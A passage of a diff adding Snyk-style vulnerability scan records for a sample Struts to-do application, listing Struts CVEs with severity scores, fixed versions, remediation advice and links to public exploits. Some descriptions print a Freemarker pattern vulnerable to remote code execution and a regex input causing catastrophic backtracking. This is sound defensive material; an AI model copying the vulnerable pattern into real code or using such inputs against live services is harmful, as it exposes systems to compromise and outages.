"disclosureTime": "2017-07-13T15:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.213194Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Adam Cazzolla", + "Jonathan Bullock" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-050.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:13.755151Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", + "epssDetails": { + "percentile": "0.90011", + "probability": "0.02403", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9804" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:48.540352Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Huijun Chen", + "Xiaolong Zhu" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-051.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:13.751396Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", + "epssDetails": { + "percentile": "0.99002", + "probability": "0.93195", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9793" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.883631Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Lupin", + "David Greene", + "Roland McIntosh" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.12)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.3.34", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", + "title": "Apache Security Bulletin" + }, + { + "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:02.858095Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", + "epssDetails": { + "percentile": "0.99858", + "probability": "0.97300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-12611" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.617066Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Man Yue Mo" + ], + "semver": { + "vulnerable": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.35", + "2.5.17" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "filePath": "com/opensymphony/xwork2/ActionChainResult.java", + "className": "ActionChainResult", + "functionName": "execute" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", + "title": "Lgtm Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", + "title": "Struts2 Security Bulletin" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.323655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", + "epssDetails": { + "percentile": "0.99991", + "probability": "0.97527", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11776" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2018-08-22T00:00:00Z", + "functions_new": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "className": "com.opensymphony.xwork2.ActionChainResult", + "functionName": "execute" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-08-17T00:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2018-08-22T11:53:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.324260Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.35" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "title": "Improper Action Name Cleanup", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.29)", + "[2.5, 2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:23.840033Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", + "epssDetails": { + "percentile": "0.89903", + "probability": "0.02365", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4436" + ], + "CWE": [ + "CWE-459" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-07-16T11:14:42.540198Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-09-19T05:25:51Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-09-19T05:25:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.582114Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)", + "[2.5,2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-08-23T13:23:19.812650Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + 